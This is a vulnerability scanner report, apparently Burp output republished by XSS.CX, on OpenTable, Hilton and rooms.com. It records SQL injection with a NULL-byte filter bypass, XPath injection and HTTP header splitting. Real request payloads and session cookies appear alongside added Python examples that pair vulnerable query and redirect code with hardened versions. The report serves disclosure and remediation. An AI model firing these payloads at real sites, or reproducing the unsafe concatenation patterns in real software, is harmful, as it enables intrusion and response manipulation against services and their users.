Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...
<form name="Form1" method="post" action="500.aspx?aspxerrorpath=%2f404.aspx" id="Form1">
...[SNIP]...
<span id="lblMsgSubTitle">We're sorry, but we encountered a failure during the last operation. Please try again.</span>
...[SNIP]...
e="Powered By OpenTable: Restaurant Reservations. Right this way." class="footerPoweredByLogo" Text="Powered By OpenTable: Restaurant Reservations. Right this way." src="/img/buttons/poweredbyOpenTableStacked.png" style="border-width:0px;" />
...[SNIP]...

Request 2

GET /jscripts/ScriptHandler.ashx''?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:54:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a31&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=1&rr1=90&rr2=90&er=0&hr=http://www.grandcafe-sf.com/&tp=125; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...

1.8. http://www3.hilton.com/en_US/hi/search/findhotels/results.htm [ClrSCD cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/results.htm

Issue detail

The ClrSCD cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ClrSCD cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
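Added example, not from the report or from the Hilton application: a model of the NULL-byte bypass described above. The "native filter" percent-decodes the cookie value and then scans it with C string semantics, where a 0x00 byte terminates the string and everything after it is invisible to strchr()/strstr(); that truncation is modelled here by cutting the buffer at the first NUL. The application runtime (a Java servlet container in this finding) keeps the full length, so the quote after the NUL reaches the back end. The blocklist and the cookie value format are assumptions; the payload shape (1317646383790%00') is the one recorded in Request 1.

```python
from urllib.parse import unquote_to_bytes

# Assumed blocklist for the illustrative native-code filter.
BLOCKED = (b"'", b'"', b"--", b";")


def as_c_string(data: bytes) -> bytes:
    # Model of a NUL-terminated char buffer: strchr()/strstr() stop at the
    # first 0x00 byte, so the filter never sees what follows it.
    return data.split(b"\x00", 1)[0]


def native_filter_blocks(raw_cookie_value: str) -> bool:
    # WAF written in C: decode %xx sequences, then scan the C string.
    decoded = unquote_to_bytes(raw_cookie_value)
    visible = as_c_string(decoded)
    return any(tok in visible for tok in BLOCKED)


def application_sees(raw_cookie_value: str) -> bytes:
    # Managed runtime: strings carry an explicit length, so the bytes after
    # the NUL survive decoding and are handed to the query layer intact.
    return unquote_to_bytes(raw_cookie_value)


def bypass_succeeds(raw_cookie_value: str) -> bool:
    # The bypass works when the filter passes the value but the application
    # still receives a blocked token.
    decoded = application_sees(raw_cookie_value)
    return (not native_filter_blocks(raw_cookie_value)) and any(
        tok in decoded for tok in BLOCKED
    )


def length_aware_filter_blocks(raw_cookie_value: str) -> bool:
    # Filter-side fix: operate on the full decoded length and reject embedded
    # NULs outright. The application-side fix (parameterized queries) is still
    # required; this only closes the filter's blind spot.
    decoded = unquote_to_bytes(raw_cookie_value)
    return b"\x00" in decoded or any(tok in decoded for tok in BLOCKED)
```

The same truncation affects any native-code check that is applied after decoding, whether it is a WAF rule, an IDS signature or a C extension in the application; the only reliable fix is to remove the injection in the application code and treat the filter as defence in depth.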

Request 1

GET /en_US/hi/search/findhotels/results.htm?view=LIST HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790%00'; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 12:54:08 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 7567
Date: Mon, 03 Oct 2011 12:54:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml
...[SNIP]...
<![CDATA[
rb={"error_207":"Please enter an HHonors number or a username at least 4 characters long.","res_limitSelections":"res_limitSelections","error_208":"Please enter a PIN or Password at least 4 characters long.","da
...[SNIP]...

Request 2

GET /en_US/hi/search/findhotels/results.htm?view=LIST HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790%00''; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623

Response 2

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 276089
Date: Mon, 03 Oct 2011 12:54:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...

2. XPath injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.opentable.com
Path:   /rest_profile.aspx

Issue detail

The lsCKE cookie appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the lsCKE cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Note that the response excerpt reproduced below is truncated and does not include the error text, so the XPath error cannot be verified from this page alone. What the excerpt does show is that the payload is reflected back unmodified in the Set-Cookie: lsCKE=ors=otrestref%00'... headers, so the cookie value is re-emitted without validation whatever happens to it server-side.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
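Added example, not from the report or from the OpenTable application: an XPath predicate built from a cookie value by string concatenation, the parse error that the %00' payload produces in it, and an allowlisted version that validates the value as the remediation above describes and then compares it as data rather than as query text. The users document and its name/role attributes are constructed. Python's xml.etree implements only an XPath subset (no "or"), so this reproduces the error signal the scanner keys on rather than a full predicate bypass such as ' or '1'='1; the same concatenation against a full XPath engine would allow that bypass.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# Constructed sample document standing in for whatever the application queries.
USERS_XML = """
<users>
  <user name="otrestref" role="referrer"/>
  <user name="admin" role="admin"/>
</users>
"""
ROOT = ET.fromstring(USERS_XML)

# Allowlist from the remediation text: short alphanumeric strings only.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def find_roles_vulnerable(raw_cookie_value: str):
    # Vulnerable: the decoded cookie value becomes part of the XPath text.
    # "otrestref%00'" decodes to "otrestref\x00'" and yields the predicate
    # user[@name='otrestref\x00''], which the XPath parser rejects.
    value = unquote(raw_cookie_value)
    expr = "user[@name='" + value + "']"
    return [u.get("role") for u in ROOT.findall(expr)]


def find_roles_safe(raw_cookie_value: str):
    # Hardened: reject anything outside the allowlist before it gets near the
    # query, then filter in code so the value is never parsed as XPath.
    value = unquote(raw_cookie_value)
    if not SAFE_VALUE.fullmatch(value):
        raise ValueError("rejected: value contains XPath metacharacters or is too long")
    return [u.get("role") for u in ROOT.findall("user") if u.get("name") == value]


def probe(lookup, raw_cookie_value: str) -> str:
    """Classify the outcome as a scanner would: 'ok', 'xpath-error' or 'rejected'."""
    try:
        lookup(raw_cookie_value)
        return "ok"
    except SyntaxError:          # xml.etree raises SyntaxError for a bad predicate
        return "xpath-error"
    except ValueError:
        return "rejected"
```

An "xpath-error" outcome is exactly the differential this finding reports; a "rejected" outcome from the validated version is what the remediation aims for. Where the value legitimately needs characters outside the allowlist, use the XPath engine's variable binding (XPath variables, or the parameter mechanism of the XML library in use) instead of concatenation.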

Request

GET /rest_profile.aspx?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref%00'; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:03 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a03&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153%00'&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref%00'&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref%00'&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref%00'&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=13&vbefreg=13&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:03 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref%00'&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=13&vbefreg=13&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV0iX7fFVCSU3hhJUEcO4Lt8; domain=.opentable.com; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199724


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...
RAR8JX4UOhFln7kMNH6mfch22jHHy6DJT5k8UC/PHbtuza89m1Dpb4frwKts9iVxO7NXKBoJKuKdySxbGKxPQhGA/537GFK3jpq4pp+OuxyyL4fAsvwQa3V/Vmhojn9xjHtle08elp5ZmPrl2iSiHAtqpiq+fIjmPaC/uKoYUCSSkOV6hTvA7NxjZF5CTaAbfYvTCgX6WxpatHSmpTxwxmZYq0Rm+3UpFLK3YLJKLryaXoxgDlg6I90MQuuc+35Cn+deTP/8reoxLq74g3jdXQGEnjvNFe9gO0SLw340okK4hcrN9vI6XY5AiUaCmwJ/gTfyrLJtOyrNrQdlVT3rD82rS2ZxDvpBiNxhevBfX0vkrQFJ4Jc20FiI7xY9lubHSSXXU4nrbFaerD3uYzFVUDa
...[SNIP]...

3. HTTP header injection

Summary

Severity:   High
Confidence:   Certain
Host:   http://vacations.rooms.com
Path:   /wthrooms/Search

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload 55baf%0d%0a131faa15b77 was submitted in the redirect parameter; once URL-decoded, %0d%0a is a CR LF pair, which terminated the Location header early and caused the response to contain an injected header line (131faa15b77, visible as a separate line in the response below). Note that the request body carries the redirect parameter twice, first with the payload and then empty; the application used the first occurrence.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any character with an ASCII code below 0x20 (which includes the CR, 0x0d, and LF, 0x0a, used in this payload) should be rejected outright rather than stripped. For a redirect parameter such as this one, resolving the value against a fixed list of permitted targets, so that only a path the application itself constructs ever reaches the Location header, removes the injection surface entirely.
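The following is an added example and not part of the XSS.CX/Burp report: it reproduces the header-splitting mechanics that the background and remediation text above describe, against the pattern reported for /wthrooms/Search, and places a hardened redirect handler next to the vulnerable one. The handler, the minimal response parser and the allow-list policy are illustrative assumptions; the host and the 55baf%0d%0a131faa15b77 payload are the report's, and the second, body-splitting payload is constructed here to show the "empty line breaks out into the body" case.

```python
"""Added example, not part of the XSS.CX/Burp report: reproduces the
header-splitting mechanics reported against /wthrooms/Search and shows a
hardened redirect handler next to the vulnerable pattern. The handler,
parser and allow-list policy are illustrative assumptions; the host and the
55baf%0d%0a131faa15b77 payload are the report's."""
import re
from urllib.parse import unquote

HOST = "vacations.rooms.com"
# Payload exactly as it appears in the report's request body.
PAYLOAD = "55baf%0d%0a131faa15b77"
# Constructed payload (not from the report) of the kind the background text
# describes: an empty line ends the headers and the rest becomes the body.
SPLIT_PAYLOAD = "x%0d%0aContent-Length:%2014%0d%0a%0d%0a<b>injected</b>"


def build_redirect_unsafe(redirect_param):
    """Vulnerable pattern: the URL-decoded parameter is concatenated into
    Location with no validation, so a CR LF inside it starts a new header
    line, and CR LF CR LF ends the header block entirely."""
    target = unquote(redirect_param)
    return ("HTTP/1.1 302 Moved Temporarily\r\n"
            f"Location: http://{HOST}/wthrooms/{target}?DD=WTHROOMS\r\n"
            "Content-Length: 0\r\n"
            "\r\n")


def parse_response(raw):
    """Minimal HTTP/1.1 response parser, split the way a browser or proxy
    would: status line, list of (name, value) header pairs, body."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = []
    for line in lines:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return status, headers, body


def is_safe_header_value(value):
    """Reject every control character (below 0x20) plus DEL, which is the
    minimum bar the remediation text sets for data copied into a header."""
    return all(0x20 <= ord(ch) < 0x7F for ch in value)


# Hardened policy (assumption): a redirect target here is one short token.
SAFE_TARGET = re.compile(r"[A-Za-z0-9_-]{1,64}")


def build_redirect_safe(redirect_param):
    """Hardened handler: validate the decoded value against an allow-list
    before it reaches the header; anything else gets a 400, not a redirect."""
    target = unquote(redirect_param)
    if not (is_safe_header_value(target) and SAFE_TARGET.fullmatch(target)):
        return ("HTTP/1.1 400 Bad Request\r\n"
                "Content-Length: 0\r\n"
                "\r\n")
    return ("HTTP/1.1 302 Moved Temporarily\r\n"
            f"Location: http://{HOST}/wthrooms/{target}?DD=WTHROOMS\r\n"
            "Content-Length: 0\r\n"
            "\r\n")


if __name__ == "__main__":
    for payload in (PAYLOAD, SPLIT_PAYLOAD):
        _, headers, body = parse_response(build_redirect_unsafe(payload))
        print("unsafe:", headers, repr(body))
        print("safe:  ", build_redirect_safe(payload).split("\r\n")[0])
```

Running it shows the report's payload producing a third header line the handler never wrote, the constructed payload ending the header block so that everything after it is served as the body, and the hardened handler answering both with a 400 because the decoded value fails the control-character check before any allow-list is consulted.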

Request

POST /wthrooms/Search HTTP/1.1
Host: vacations.rooms.com
Proxy-Connection: keep-alive
Content-Length: 1018
Cache-Control: max-age=0
Origin: http://vacations.rooms.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://vacations.rooms.com/wthrooms/Search?DD=WTHROOMS
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CPcon=SVNmVFhSQUkGLEJtbVVXZUtCVF9WAi9CbGpVUWRQWFJEUhguX2h0T1FiUUZaQlEDLVVka05bZVFH; neatCookie=enabled; CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08; NSC_JOaksdonexqqkmfdksdxeobfzo4u3cu=ffffffff09e4422045525d5f4f58455e445a4a423667; NSC_JOzk4stad1yyufndg4seu3dcmzgkbde=ffffffff09e3883145525d5f4f58455e445a4a423660; __utma=197011247.946458482.1317645735.1317645735.1317645735.1; __utmb=197011247.2.9.1317645765426; __utmc=197011247; __utmz=197011247.1317645735.1.1.utmcsr=cruisesonly.com|utmccn=(referral)|utmcmd=referral|utmcct=/sc.do; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317642339727:ss=1317642189940

redirect=55baf%0d%0a131faa15b77&mode=advanced&products=AHC&redirect=&airMode=&hotelMode=&carMode=&fromLocationId=&toLocationId=&DD=WTHROOMS&hotelLocationId=&hotelLocationToAdd=&hotelPropertyId=&differentHotelCity=false&ProductType=
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 12:58:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: -1
Set-Cookie: CDENsession=RgPWjSdMQ3rDCMNFCk9qzIqqT.CWMDEN08
P3P: CP="NOI DSP LAW NID CUR TAIa CONi OUR STP UNI STA"
